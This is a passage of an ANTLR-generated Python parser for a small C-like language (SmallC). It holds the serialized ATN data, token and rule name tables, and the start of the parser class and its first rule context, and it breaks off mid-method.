        buf.write("\u0186\n\34\3\35\3\35\3\35\3\35\3\35\3\35\3\35\5\35\u018f")
        buf.write("\n\35\3\36\3\36\3\36\3\36\3\36\3\36\5\36\u0197\n\36\3")
        buf.write("\37\3\37\3\37\3 \3 \3 \3 \3 \3 \3!\3!\3!\3!\3!\3!\3!\3")
        buf.write("!\3\"\3\"\3\"\3\"\5\"\u01ae\n\"\3\"\3\"\3\"\3\"\3\"\3")
        buf.write("\"\3\"\3#\6#\u01b8\n#\r#\16#\u01b9\3#\3#\3#\7#\u01bf\n")
        buf.write("#\f#\16#\u01c2\13#\3$\3$\5$\u01c6\n$\3%\3%\3&\3&\3&\3")
        buf.write("&\3&\5&\u01cf\n&\3&\3&\3&\5&\u01d4\n&\5&\u01d6\n&\3\'")
        buf.write("\3\'\3\'\3\'\3\'\3\'\5\'\u01de\n\'\5\'\u01e0\n\'\3(\3")
        buf.write("(\3(\3(\3(\7(\u01e7\n(\f(\16(\u01ea\13(\3(\3(\6(\u01ee")
        buf.write("\n(\r(\16(\u01ef\3(\3(\5(\u01f4\n(\3)\3)\3)\3)\7)\u01fa")
        buf.write("\n)\f)\16)\u01fd\13)\5)\u01ff\n)\3)\3)\5)\u0203\n)\3*")
        buf.write("\3*\5*\u0207\n*\3+\3+\3+\7+\u020c\n+\f+\16+\u020f\13+")
        buf.write("\3+\5+\u0212\n+\3,\3,\3,\3,\3,\3-\3-\3.\3.\3/\3/\3\60")
        buf.write("\3\60\3\61\3\61\3\62\3\62\3\63\3\63\3\64\3\64\3\64\2\t")
        buf.write("\b\n\22\24\30\32\36\65\2\4\6\b\n\f\16\20\22\24\26\30\32")
        buf.write("\34\36 \"$&(*,.\60\62\64\668:<>@BDFHJLNPRTVXZ\\^`bdf\2")
        buf.write("\3\3\2\"%\u024a\2h\3\2\2\2\4o\3\2\2\2\6x\3\2\2\2\bz\3")
        buf.write("\2\2\2\n\u0085\3\2\2\2\f\u0090\3\2\2\2\16\u0092\3\2\2")
        buf.write("\2\20\u0094\3\2\2\2\22\u0096\3\2\2\2\24\u00a4\3\2\2\2")
        buf.write("\26\u00b8\3\2\2\2\30\u00ba\3\2\2\2\32\u00c8\3\2\2\2\34")
        buf.write("\u00ee\3\2\2\2\36\u00fa\3\2\2\2 \u0112\3\2\2\2\"\u011c")
        buf.write("\3\2\2\2$\u011e\3\2\2\2&\u0122\3\2\2\2(\u0125\3\2\2\2")
        buf.write("*\u0136\3\2\2\2,\u0150\3\2\2\2.\u0153\3\2\2\2\60\u0163")
        buf.write("\3\2\2\2\62\u0167\3\2\2\2\64\u016d\3\2\2\2\66\u0185\3")
        buf.write("\2\2\28\u018e\3\2\2\2:\u0190\3\2\2\2<\u0198\3\2\2\2>\u019b")
        buf.write("\3\2\2\2@\u01a1\3\2\2\2B\u01a9\3\2\2\2D\u01b7\3\2\2\2")
        buf.write("F\u01c5\3\2\2\2H\u01c7\3\2\2\2J\u01d5\3\2\2\2L\u01df\3")
        buf.write("\2\2\2N\u01f3\3\2\2\2P\u0202\3\2\2\2R\u0204\3\2\2\2T\u0211")
        buf.write("\3\2\2\2V\u0213\3\2\2\2X\u0218\3\2\2\2Z\u021a\3\2\2\2")
        buf.write("\\\u021c\3\2\2\2^\u021e\3\2\2\2`\u0220\3\2\2\2b\u0222")
        buf.write("\3\2\2\2d\u0224\3\2\2\2f\u0226\3\2\2\2hi\5\4\3\2i\3\3")
        buf.write("\2\2\2jk\5\6\4\2kl\7\3\2\2lm\5\4\3\2mp\3\2\2\2np\5\6\4")
        buf.write("\2oj\3\2\2\2on\3\2\2\2p\5\3\2\2\2qr\5\b\5\2rs\7\4\2\2")
        buf.write("st\5\b\5\2tu\7\5\2\2uv\5\6\4\2vy\3\2\2\2wy\5\b\5\2xq\3")
        buf.write("\2\2\2xw\3\2\2\2y\7\3\2\2\2z{\b\5\1\2{|\5\n\6\2|\u0082")
        buf.write("\3\2\2\2}~\f\4\2\2~\177\7\6\2\2\177\u0081\5\n\6\2\u0080")
        buf.write("}\3\2\2\2\u0081\u0084\3\2\2\2\u0082\u0080\3\2\2\2\u0082")
        buf.write("\u0083\3\2\2\2\u0083\t\3\2\2\2\u0084\u0082\3\2\2\2\u0085")
        buf.write("\u0086\b\6\1\2\u0086\u0087\5\22\n\2\u0087\u008d\3\2\2")
        buf.write("\2\u0088\u0089\f\4\2\2\u0089\u008a\7\7\2\2\u008a\u008c")
        buf.write("\5\22\n\2\u008b\u0088\3\2\2\2\u008c\u008f\3\2\2\2\u008d")
        buf.write("\u008b\3\2\2\2\u008d\u008e\3\2\2\2\u008e\13\3\2\2\2\u008f")
        buf.write("\u008d\3\2\2\2\u0090\u0091\5\16\b\2\u0091\r\3\2\2\2\u0092")
        buf.write("\u0093\5\20\t\2\u0093\17\3\2\2\2\u0094\u0095\5\22\n\2")
        buf.write("\u0095\21\3\2\2\2\u0096\u0097\b\n\1\2\u0097\u0098\5\24")
        buf.write("\13\2\u0098\u00a1\3\2\2\2\u0099\u009a\f\5\2\2\u009a\u009b")
        buf.write("\7\b\2\2\u009b\u00a0\5\24\13\2\u009c\u009d\f\4\2\2\u009d")
        buf.write("\u009e\7\t\2\2\u009e\u00a0\5\24\13\2\u009f\u0099\3\2\2")
        buf.write("\2\u009f\u009c\3\2\2\2\u00a0\u00a3\3\2\2\2\u00a1\u009f")
        buf.write("\3\2\2\2\u00a1\u00a2\3\2\2\2\u00a2\23\3\2\2\2\u00a3\u00a1")
        buf.write("\3\2\2\2\u00a4\u00a5\b\13\1\2\u00a5\u00a6\5\30\r\2\u00a6")
        buf.write("\u00b5\3\2\2\2\u00a7\u00a8\f\7\2\2\u00a8\u00a9\7\33\2")
        buf.write("\2\u00a9\u00b4\5\30\r\2\u00aa\u00ab\f\6\2\2\u00ab\u00ac")
        buf.write("\7\n\2\2\u00ac\u00b4\5\30\r\2\u00ad\u00ae\f\5\2\2\u00ae")
        buf.write("\u00af\7\34\2\2\u00af\u00b4\5\30\r\2\u00b0\u00b1\f\4\2")
        buf.write("\2\u00b1\u00b2\7\13\2\2\u00b2\u00b4\5\30\r\2\u00b3\u00a7")
        buf.write("\3\2\2\2\u00b3\u00aa\3\2\2\2\u00b3\u00ad\3\2\2\2\u00b3")
        buf.write("\u00b0\3\2\2\2\u00b4\u00b7\3\2\2\2\u00b5\u00b3\3\2\2\2")
        buf.write("\u00b5\u00b6\3\2\2\2\u00b6\25\3\2\2\2\u00b7\u00b5\3\2")
        buf.write("\2\2\u00b8\u00b9\5\30\r\2\u00b9\27\3\2\2\2\u00ba\u00bb")
        buf.write("\b\r\1\2\u00bb\u00bc\5\32\16\2\u00bc\u00c5\3\2\2\2\u00bd")
        buf.write("\u00be\f\5\2\2\u00be\u00bf\7\f\2\2\u00bf\u00c4\5\32\16")
        buf.write("\2\u00c0\u00c1\f\4\2\2\u00c1\u00c2\7\r\2\2\u00c2\u00c4")
        buf.write("\5\32\16\2\u00c3\u00bd\3\2\2\2\u00c3\u00c0\3\2\2\2\u00c4")
        buf.write("\u00c7\3\2\2\2\u00c5\u00c3\3\2\2\2\u00c5\u00c6\3\2\2\2")
        buf.write("\u00c6\31\3\2\2\2\u00c7\u00c5\3\2\2\2\u00c8\u00c9\b\16")
        buf.write("\1\2\u00c9\u00ca\5\34\17\2\u00ca\u00d6\3\2\2\2\u00cb\u00cc")
        buf.write("\f\6\2\2\u00cc\u00cd\7\16\2\2\u00cd\u00d5\5\34\17\2\u00ce")
        buf.write("\u00cf\f\5\2\2\u00cf\u00d0\7\17\2\2\u00d0\u00d5\5\34\17")
        buf.write("\2\u00d1\u00d2\f\4\2\2\u00d2\u00d3\7\20\2\2\u00d3\u00d5")
        buf.write("\5\34\17\2\u00d4\u00cb\3\2\2\2\u00d4\u00ce\3\2\2\2\u00d4")
        buf.write("\u00d1\3\2\2\2\u00d5\u00d8\3\2\2\2\u00d6\u00d4\3\2\2\2")
        buf.write("\u00d6\u00d7\3\2\2\2\u00d7\33\3\2\2\2\u00d8\u00d6\3\2")
        buf.write("\2\2\u00d9\u00da\7\21\2\2\u00da\u00ef\5\34\17\2\u00db")
        buf.write("\u00dc\7\22\2\2\u00dc\u00ef\5\34\17\2\u00dd\u00de\7\f")
        buf.write("\2\2\u00de\u00ef\5\34\17\2\u00df\u00e0\7\r\2\2\u00e0\u00ef")
        buf.write("\5\34\17\2\u00e1\u00e2\7\23\2\2\u00e2\u00ef\5\36\20\2")
        buf.write("\u00e3\u00e4\7\16\2\2\u00e4\u00ef\5\34\17\2\u00e5\u00e6")
        buf.write("\7\24\2\2\u00e6\u00ef\5\34\17\2\u00e7\u00ef\5V,\2\u00e8")
        buf.write("\u00e9\7\31\2\2\u00e9\u00ea\5^\60\2\u00ea\u00eb\7\32\2")
        buf.write("\2\u00eb\u00ec\5\34\17\2\u00ec\u00ef\3\2\2\2\u00ed\u00ef")
        buf.write("\5\36\20\2\u00ee\u00d9\3\2\2\2\u00ee\u00db\3\2\2\2\u00ee")
        buf.write("\u00dd\3\2\2\2\u00ee\u00df\3\2\2\2\u00ee\u00e1\3\2\2\2")
        buf.write("\u00ee\u00e3\3\2\2\2\u00ee\u00e5\3\2\2\2\u00ee\u00e7\3")
        buf.write("\2\2\2\u00ee\u00e8\3\2\2\2\u00ee\u00ed\3\2\2\2\u00ef\35")
        buf.write("\3\2\2\2\u00f0\u00f1\b\20\1\2\u00f1\u00fb\5X-\2\u00f2")
        buf.write("\u00fb\5`\61\2\u00f3\u00fb\5b\62\2\u00f4\u00fb\5d\63\2")
        buf.write("\u00f5\u00fb\5f\64\2\u00f6\u00f7\7\31\2\2\u00f7\u00f8")
        buf.write("\58\35\2\u00f8\u00f9\7\32\2\2\u00f9\u00fb\3\2\2\2\u00fa")
        buf.write("\u00f0\3\2\2\2\u00fa\u00f2\3\2\2\2\u00fa\u00f3\3\2\2\2")
        buf.write("\u00fa\u00f4\3\2\2\2\u00fa\u00f5\3\2\2\2\u00fa\u00f6\3")
        buf.write("\2\2\2\u00fb\u0107\3\2\2\2\u00fc\u00fd\f\13\2\2\u00fd")
        buf.write("\u0106\7\21\2\2\u00fe\u00ff\f\n\2\2\u00ff\u0106\7\22\2")
        buf.write("\2\u0100\u0101\f\t\2\2\u0101\u0102\7\37\2\2\u0102\u0103")
        buf.write("\58\35\2\u0103\u0104\7 \2\2\u0104\u0106\3\2\2\2\u0105")
        buf.write("\u00fc\3\2\2\2\u0105\u00fe\3\2\2\2\u0105\u0100\3\2\2\2")
        buf.write("\u0106\u0109\3\2\2\2\u0107\u0105\3\2\2\2\u0107\u0108\3")
        buf.write("\2\2\2\u0108\37\3\2\2\2\u0109\u0107\3\2\2\2\u010a\u0111")
        buf.write("\5\"\22\2\u010b\u0111\5(\25\2\u010c\u0111\5*\26\2\u010d")
        buf.write("\u010e\5D#\2\u010e\u010f\7\25\2\2\u010f\u0111\3\2\2\2")
        buf.write("\u0110\u010a\3\2\2\2\u0110\u010b\3\2\2\2\u0110\u010c\3")
        buf.write("\2\2\2\u0110\u010d\3\2\2\2\u0111\u0114\3\2\2\2\u0112\u0110")
        buf.write("\3\2\2\2\u0112\u0113\3\2\2\2\u0113!\3\2\2\2\u0114\u0112")
        buf.write("\3\2\2\2\u0115\u0116\7\26\2\2\u0116\u0117\7\33\2\2\u0117")
        buf.write("\u0118\5$\23\2\u0118\u0119\7\34\2\2\u0119\u011d\3\2\2")
        buf.write("\2\u011a\u011b\7\26\2\2\u011b\u011d\5&\24\2\u011c\u0115")
        buf.write("\3\2\2\2\u011c\u011a\3\2\2\2\u011d#\3\2\2\2\u011e\u011f")
        buf.write("\5Z.\2\u011f\u0120\7\27\2\2\u0120\u0121\5Z.\2\u0121%\3")
        buf.write("\2\2\2\u0122\u0123\5f\64\2\u0123\'\3\2\2\2\u0124\u0126")
        buf.write("\5F$\2\u0125\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\u0125")
        buf.write("\3\2\2\2\u0127\u0128\3\2\2\2\u0128\u012c\3\2\2\2\u0129")
        buf.write("\u012b\5\60\31\2\u012a\u0129\3\2\2\2\u012b\u012e\3\2\2")
        buf.write("\2\u012c\u012a\3\2\2\2\u012c\u012d\3\2\2\2\u012d\u012f")
        buf.write("\3\2\2\2\u012e\u012c\3\2\2\2\u012f\u0130\5Z.\2\u0130\u0131")
        buf.write("\7\31\2\2\u0131\u0132\5,\27\2\u0132\u0133\7\32\2\2\u0133")
        buf.write("\u0134\7\25\2\2\u0134)\3\2\2\2\u0135\u0137\5F$\2\u0136")
        buf.write("\u0135\3\2\2\2\u0137\u0138\3\2\2\2\u0138\u0136\3\2\2\2")
        buf.write("\u0138\u0139\3\2\2\2\u0139\u013d\3\2\2\2\u013a\u013c\5")
        buf.write("\60\31\2\u013b\u013a\3\2\2\2\u013c\u013f\3\2\2\2\u013d")
        buf.write("\u013b\3\2\2\2\u013d\u013e\3\2\2\2\u013e\u0140\3\2\2\2")
        buf.write("\u013f\u013d\3\2\2\2\u0140\u0141\5Z.\2\u0141\u0142\7\31")
        buf.write("\2\2\u0142\u0143\5,\27\2\u0143\u0144\7\32\2\2\u0144\u0145")
        buf.write("\5\64\33\2\u0145+\3\2\2\2\u0146\u0151\3\2\2\2\u0147\u014c")
        buf.write("\5.\30\2\u0148\u0149\7\30\2\2\u0149\u014b\5.\30\2\u014a")
        buf.write("\u0148\3\2\2\2\u014b\u014e\3\2\2\2\u014c\u014a\3\2\2\2")
        buf.write("\u014c\u014d\3\2\2\2\u014d\u0151\3\2\2\2\u014e\u014c\3")
        buf.write("\2\2\2\u014f\u0151\3\2\2\2\u0150\u0146\3\2\2\2\u0150\u0147")
        buf.write("\3\2\2\2\u0150\u014f\3\2\2\2\u0151-\3\2\2\2\u0152\u0154")
        buf.write("\5F$\2\u0153\u0152\3\2\2\2\u0154\u0155\3\2\2\2\u0155\u0153")
        buf.write("\3\2\2\2\u0155\u0156\3\2\2\2\u0156\u015a\3\2\2\2\u0157")
        buf.write("\u0159\5\60\31\2\u0158\u0157\3\2\2\2\u0159\u015c\3\2\2")
        buf.write("\2\u015a\u0158\3\2\2\2\u015a\u015b\3\2\2\2\u015b\u015e")
        buf.write("\3\2\2\2\u015c\u015a\3\2\2\2\u015d\u015f\5Z.\2\u015e\u015d")
        buf.write("\3\2\2\2\u015e\u015f\3\2\2\2\u015f\u0161\3\2\2\2\u0160")
        buf.write("\u0162\5\62\32\2\u0161\u0160\3\2\2\2\u0161\u0162\3\2\2")
        buf.write("\2\u0162/\3\2\2\2\u0163\u0165\5\\/\2\u0164\u0166\5H%\2")
        buf.write("\u0165\u0164\3\2\2\2\u0165\u0166\3\2\2\2\u0166\61\3\2")
        buf.write("\2\2\u0167\u0169\7\37\2\2\u0168\u016a\58\35\2\u0169\u0168")
        buf.write("\3\2\2\2\u0169\u016a\3\2\2\2\u016a\u016b\3\2\2\2\u016b")
        buf.write("\u016c\7 \2\2\u016c\63\3\2\2\2\u016d\u0171\7\35\2\2\u016e")
        buf.write("\u0170\5\66\34\2\u016f\u016e\3\2\2\2\u0170\u0173\3\2\2")
        buf.write("\2\u0171\u016f\3\2\2\2\u0171\u0172\3\2\2\2\u0172\u0174")
        buf.write("\3\2\2\2\u0173\u0171\3\2\2\2\u0174\u0175\7\36\2\2\u0175")
        buf.write("\65\3\2\2\2\u0176\u0186\5\64\33\2\u0177\u0186\5:\36\2")
        buf.write("\u0178\u0186\5> \2\u0179\u0186\5@!\2\u017a\u0186\5B\"")
        buf.write("\2\u017b\u017c\58\35\2\u017c\u017d\7\25\2\2\u017d\u0186")
        buf.write("\3\2\2\2\u017e\u017f\5D#\2\u017f\u0180\7\25\2\2\u0180")
        buf.write("\u0186\3\2\2\2\u0181\u0182\5R*\2\u0182\u0183\7\25\2\2")
        buf.write("\u0183\u0186\3\2\2\2\u0184\u0186\7\25\2\2\u0185\u0176")
        buf.write("\3\2\2\2\u0185\u0177\3\2\2\2\u0185\u0178\3\2\2\2\u0185")
        buf.write("\u0179\3\2\2\2\u0185\u017a\3\2\2\2\u0185\u017b\3\2\2\2")
        buf.write("\u0185\u017e\3\2\2\2\u0185\u0181\3\2\2\2\u0185\u0184\3")
        buf.write("\2\2\2\u0186\67\3\2\2\2\u0187\u018f\5X-\2\u0188\u018f")
        buf.write("\5`\61\2\u0189\u018f\5b\62\2\u018a\u018f\5d\63\2\u018b")
        buf.write("\u018f\5f\64\2\u018c\u018f\5V,\2\u018d\u018f\5\4\3\2\u018e")
        buf.write("\u0187\3\2\2\2\u018e\u0188\3\2\2\2\u018e\u0189\3\2\2\2")
        buf.write("\u018e\u018a\3\2\2\2\u018e\u018b\3\2\2\2\u018e\u018c\3")
        buf.write("\2\2\2\u018e\u018d\3\2\2\2\u018f9\3\2\2\2\u0190\u0191")
        buf.write("\7)\2\2\u0191\u0192\7\31\2\2\u0192\u0193\58\35\2\u0193")
        buf.write("\u0194\7\32\2\2\u0194\u0196\5\66\34\2\u0195\u0197\5<\37")
        buf.write("\2\u0196\u0195\3\2\2\2\u0196\u0197\3\2\2\2\u0197;\3\2")
        buf.write("\2\2\u0198\u0199\7*\2\2\u0199\u019a\5\66\34\2\u019a=\3")
        buf.write("\2\2\2\u019b\u019c\7,\2\2\u019c\u019d\7\31\2\2\u019d\u019e")
        buf.write("\58\35\2\u019e\u019f\7\32\2\2\u019f\u01a0\5\66\34\2\u01a0")
        buf.write("?\3\2\2\2\u01a1\u01a2\7+\2\2\u01a2\u01a3\5\64\33\2\u01a3")
        buf.write("\u01a4\7,\2\2\u01a4\u01a5\7\31\2\2\u01a5\u01a6\58\35\2")
        buf.write("\u01a6\u01a7\7\32\2\2\u01a7\u01a8\7\25\2\2\u01a8A\3\2")
        buf.write("\2\2\u01a9\u01aa\7-\2\2\u01aa\u01ad\7\31\2\2\u01ab\u01ae")
        buf.write("\5D#\2\u01ac\u01ae\5X-\2\u01ad\u01ab\3\2\2\2\u01ad\u01ac")
        buf.write("\3\2\2\2\u01ae\u01af\3\2\2\2\u01af\u01b0\7\25\2\2\u01b0")
        buf.write("\u01b1\58\35\2\u01b1\u01b2\7\25\2\2\u01b2\u01b3\58\35")
        buf.write("\2\u01b3\u01b4\7\32\2\2\u01b4\u01b5\5\66\34\2\u01b5C\3")
        buf.write("\2\2\2\u01b6\u01b8\5F$\2\u01b7\u01b6\3\2\2\2\u01b8\u01b9")
        buf.write("\3\2\2\2\u01b9\u01b7\3\2\2\2\u01b9\u01ba\3\2\2\2\u01ba")
        buf.write("\u01bb\3\2\2\2\u01bb\u01c0\5J&\2\u01bc\u01bd\7\30\2\2")
        buf.write("\u01bd\u01bf\5J&\2\u01be\u01bc\3\2\2\2\u01bf\u01c2\3\2")
        buf.write("\2\2\u01c0\u01be\3\2\2\2\u01c0\u01c1\3\2\2\2\u01c1E\3")
        buf.write("\2\2\2\u01c2\u01c0\3\2\2\2\u01c3\u01c6\5^\60\2\u01c4\u01c6")
        buf.write("\5H%\2\u01c5\u01c3\3\2\2\2\u01c5\u01c4\3\2\2\2\u01c6G")
        buf.write("\3\2\2\2\u01c7\u01c8\7&\2\2\u01c8I\3\2\2\2\u01c9\u01ca")
        buf.write("\7\31\2\2\u01ca\u01cb\5L\'\2\u01cb\u01ce\7\32\2\2\u01cc")
        buf.write("\u01cd\7\3\2\2\u01cd\u01cf\5P)\2\u01ce\u01cc\3\2\2\2\u01ce")
        buf.write("\u01cf\3\2\2\2\u01cf\u01d6\3\2\2\2\u01d0\u01d3\5L\'\2")
        buf.write("\u01d1\u01d2\7\3\2\2\u01d2\u01d4\5P)\2\u01d3\u01d1\3\2")
        buf.write("\2\2\u01d3\u01d4\3\2\2\2\u01d4\u01d6\3\2\2\2\u01d5\u01c9")
        buf.write("\3\2\2\2\u01d5\u01d0\3\2\2\2\u01d6K\3\2\2\2\u01d7\u01d8")
        buf.write("\7\31\2\2\u01d8\u01d9\5L\'\2\u01d9\u01da\7\32\2\2\u01da")
        buf.write("\u01e0\3\2\2\2\u01db\u01dd\5N(\2\u01dc\u01de\5\62\32\2")
        buf.write("\u01dd\u01dc\3\2\2\2\u01dd\u01de\3\2\2\2\u01de\u01e0\3")
        buf.write("\2\2\2\u01df\u01d7\3\2\2\2\u01df\u01db\3\2\2\2\u01e0M")
        buf.write("\3\2\2\2\u01e1\u01e2\7\31\2\2\u01e2\u01e3\5N(\2\u01e3")
        buf.write("\u01e4\7\32\2\2\u01e4\u01f4\3\2\2\2\u01e5\u01e7\5\60\31")
        buf.write("\2\u01e6\u01e5\3\2\2\2\u01e7\u01ea\3\2\2\2\u01e8\u01e6")
        buf.write("\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9\u01eb\3\2\2\2\u01ea")
        buf.write("\u01e8\3\2\2\2\u01eb\u01f4\5Z.\2\u01ec\u01ee\5\60\31\2")
        buf.write("\u01ed\u01ec\3\2\2\2\u01ee\u01ef\3\2\2\2\u01ef\u01ed\3")
        buf.write("\2\2\2\u01ef\u01f0\3\2\2\2\u01f0\u01f1\3\2\2\2\u01f1\u01f2")
        buf.write("\5L\'\2\u01f2\u01f4\3\2\2\2\u01f3\u01e1\3\2\2\2\u01f3")
        buf.write("\u01e8\3\2\2\2\u01f3\u01ed\3\2\2\2\u01f4O\3\2\2\2\u01f5")
        buf.write("\u01fe\7\35\2\2\u01f6\u01fb\58\35\2\u01f7\u01f8\7\30\2")
        buf.write("\2\u01f8\u01fa\58\35\2\u01f9\u01f7\3\2\2\2\u01fa\u01fd")
        buf.write("\3\2\2\2\u01fb\u01f9\3\2\2\2\u01fb\u01fc\3\2\2\2\u01fc")
        buf.write("\u01ff\3\2\2\2\u01fd\u01fb\3\2\2\2\u01fe\u01f6\3\2\2\2")
        buf.write("\u01fe\u01ff\3\2\2\2\u01ff\u0200\3\2\2\2\u0200\u0203\7")
        buf.write("\36\2\2\u0201\u0203\58\35\2\u0202\u01f5\3\2\2\2\u0202")
        buf.write("\u0201\3\2\2\2\u0203Q\3\2\2\2\u0204\u0206\7\60\2\2\u0205")
        buf.write("\u0207\58\35\2\u0206\u0205\3\2\2\2\u0206\u0207\3\2\2\2")
        buf.write("\u0207S\3\2\2\2\u0208\u020d\58\35\2\u0209\u020a\7\30\2")
        buf.write("\2\u020a\u020c\58\35\2\u020b\u0209\3\2\2\2\u020c\u020f")
        buf.write("\3\2\2\2\u020d\u020b\3\2\2\2\u020d\u020e\3\2\2\2\u020e")
        buf.write("\u0212\3\2\2\2\u020f\u020d\3\2\2\2\u0210\u0212\3\2\2\2")
        buf.write("\u0211\u0208\3\2\2\2\u0211\u0210\3\2\2\2\u0212U\3\2\2")
        buf.write("\2\u0213\u0214\5Z.\2\u0214\u0215\7\31\2\2\u0215\u0216")
        buf.write("\5T+\2\u0216\u0217\7\32\2\2\u0217W\3\2\2\2\u0218\u0219")
        buf.write("\5Z.\2\u0219Y\3\2\2\2\u021a\u021b\7\65\2\2\u021b[\3\2")
        buf.write("\2\2\u021c\u021d\7\16\2\2\u021d]\3\2\2\2\u021e\u021f\t")
        buf.write("\2\2\2\u021f_\3\2\2\2\u0220\u0221\7\64\2\2\u0221a\3\2")
        buf.write("\2\2\u0222\u0223\7\63\2\2\u0223c\3\2\2\2\u0224\u0225\7")
        buf.write("\66\2\2\u0225e\3\2\2\2\u0226\u0227\7\67\2\2\u0227g\3\2")
        buf.write("\2\2\67ox\u0082\u008d\u009f\u00a1\u00b3\u00b5\u00c3\u00c5")
        buf.write("\u00d4\u00d6\u00ee\u00fa\u0105\u0107\u0110\u0112\u011c")
        buf.write("\u0127\u012c\u0138\u013d\u014c\u0150\u0155\u015a\u015e")
        buf.write("\u0161\u0165\u0169\u0171\u0185\u018e\u0196\u01ad\u01b9")
        buf.write("\u01c0\u01c5\u01ce\u01d3\u01d5\u01dd\u01df\u01e8\u01ef")
        buf.write("\u01f3\u01fb\u01fe\u0202\u0206\u020d\u0211")
        return buf.getvalue()
class SmallCParser ( Parser ):
# --- Generated parser metadata (shared by all SmallCParser instances) ---
grammarFileName = "SmallC.g4"

# The ATN is deserialized once at class-definition time; the DFA cache and
# prediction-context cache are shared across parser instances.
atn = ATNDeserializer().deserialize(serializedATN())

decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]

sharedContextCache = PredictionContextCache()

# Literal display text for each token type (index == token type).
literalNames = [ "<INVALID>", "'='", "'?'", "':'", "'||'", "'&&'", "'=='",
                 "'!='", "'<='", "'>='", "'+'", "'-'", "'*'", "'/'",
                 "'%'", "'++'", "'--'", "'&'", "'!'", "';'", "'#include'",
                 "'.'", "','", "'('", "')'", "'<'", "'>'", "'{'", "'}'",
                 "'['", "']'", "'\"'", "'char'", "'float'", "'int'",
                 "'void'", "'const'", "'volatile'", "'mutable'", "'if'",
                 "'else'", "'do'", "'while'", "'for'", "'break'", "'continue'",
                 "'return'" ]

# Symbolic token names (index == token type); anonymous literals are
# "<INVALID>" here and only have an entry in literalNames.
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
                  "<INVALID>", "<INVALID>", "COMMA", "LBRA", "RBRA",
                  "LABRA", "RABRA", "LCBRA", "RCBRA", "LSBRA", "RSBRA",
                  "QUOTE", "TYPECHAR", "TYPEFLOAT", "TYPEINT", "TYPEVOID",
                  "CONST", "VOLATILE", "MUTABLE", "IF", "ELSE", "DO",
                  "WHILE", "FOR", "BREAK", "CONTINUE", "RETURN", "COMMENT",
                  "MULTICOMMENT", "INTEGER", "FLOAT", "IDENTIFIER",
                  "CHARACTER", "STRING", "WS" ]

# Rule indices, one per grammar rule, in grammar order.
RULE_oplevel15 = 0
RULE_oplevel14 = 1
RULE_oplevel13 = 2
RULE_oplevel12 = 3
RULE_oplevel11 = 4
RULE_oplevel10 = 5
RULE_oplevel9 = 6
RULE_oplevel8 = 7
RULE_oplevel7 = 8
RULE_oplevel6 = 9
RULE_oplevel5 = 10
RULE_oplevel4 = 11
RULE_oplevel3 = 12
RULE_oplevel2 = 13
RULE_oplevel1 = 14
RULE_program = 15
RULE_include = 16
RULE_stdInclude = 17
RULE_customInclude = 18
RULE_functionDeclaration = 19
RULE_functionDefinition = 20
RULE_parameters = 21
RULE_parameter = 22
RULE_pointerPart = 23
RULE_arrayPart = 24
RULE_statements = 25
RULE_statement = 26
RULE_expression = 27
RULE_ifCond = 28
RULE_elseCond = 29
RULE_whileCond = 30
RULE_doWhileCond = 31
RULE_forLoop = 32
RULE_variableDeclaration = 33
RULE_declarationSpecifier = 34
RULE_cvQualifier = 35
RULE_declaratorInitializer = 36
RULE_declarator1 = 37
RULE_declarator2 = 38
RULE_initializer = 39
RULE_returnStmt = 40
RULE_arguments = 41
RULE_functionCall = 42
RULE_variable = 43
RULE_identifier = 44
RULE_pointer = 45
RULE_typeDeclaration = 46
RULE_floatLiteral = 47
RULE_integerLiteral = 48
RULE_characterLiteral = 49
RULE_stringLiteral = 50

# Rule names indexed by rule number (parallel to the RULE_* constants).
ruleNames = [ "oplevel15", "oplevel14", "oplevel13", "oplevel12", "oplevel11",
              "oplevel10", "oplevel9", "oplevel8", "oplevel7", "oplevel6",
              "oplevel5", "oplevel4", "oplevel3", "oplevel2", "oplevel1",
              "program", "include", "stdInclude", "customInclude",
              "functionDeclaration", "functionDefinition", "parameters",
              "parameter", "pointerPart", "arrayPart", "statements",
              "statement", "expression", "ifCond", "elseCond", "whileCond",
              "doWhileCond", "forLoop", "variableDeclaration", "declarationSpecifier",
              "cvQualifier", "declaratorInitializer", "declarator1",
              "declarator2", "initializer", "returnStmt", "arguments",
              "functionCall", "variable", "identifier", "pointer",
              "typeDeclaration", "floatLiteral", "integerLiteral",
              "characterLiteral", "stringLiteral" ]

# Token-type constants.  T__N are anonymous literal tokens (see
# literalNames for their text); named tokens follow.
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
COMMA=22
LBRA=23
RBRA=24
LABRA=25
RABRA=26
LCBRA=27
RCBRA=28
LSBRA=29
RSBRA=30
QUOTE=31
TYPECHAR=32
TYPEFLOAT=33
TYPEINT=34
TYPEVOID=35
CONST=36
VOLATILE=37
MUTABLE=38
IF=39
ELSE=40
DO=41
WHILE=42
FOR=43
BREAK=44
CONTINUE=45
RETURN=46
COMMENT=47
MULTICOMMENT=48
INTEGER=49
FLOAT=50
IDENTIFIER=51
CHARACTER=52
STRING=53
WS=54
def __init__(self, input:TokenStream):
    # Build a parser over the given token stream and wire up the shared
    # ATN-based prediction machinery (class-level atn / DFA / cache).
    super().__init__(input)
    self.checkVersion("4.5.3")  # generated against ANTLR runtime 4.5.3
    self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
    # Predicate dispatch table; presumably populated lazily by sempred()
    # on first use (see the generated sempred implementation).
    self._predicates = None
class Oplevel15Context(ParserRuleContext):
    """Parse-tree context node for the oplevel15 rule."""

    def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
        super().__init__(parent, invokingState)
        self.parser = parser

    def oplevel14(self):
        # Sole child subtree of this rule.
        return self.getTypedRuleContext(SmallCParser.Oplevel14Context, 0)

    def getRuleIndex(self):
        return SmallCParser.RULE_oplevel15

    def enterRule(self, listener:ParseTreeListener):
        # Notify the listener only if it implements the enter hook.
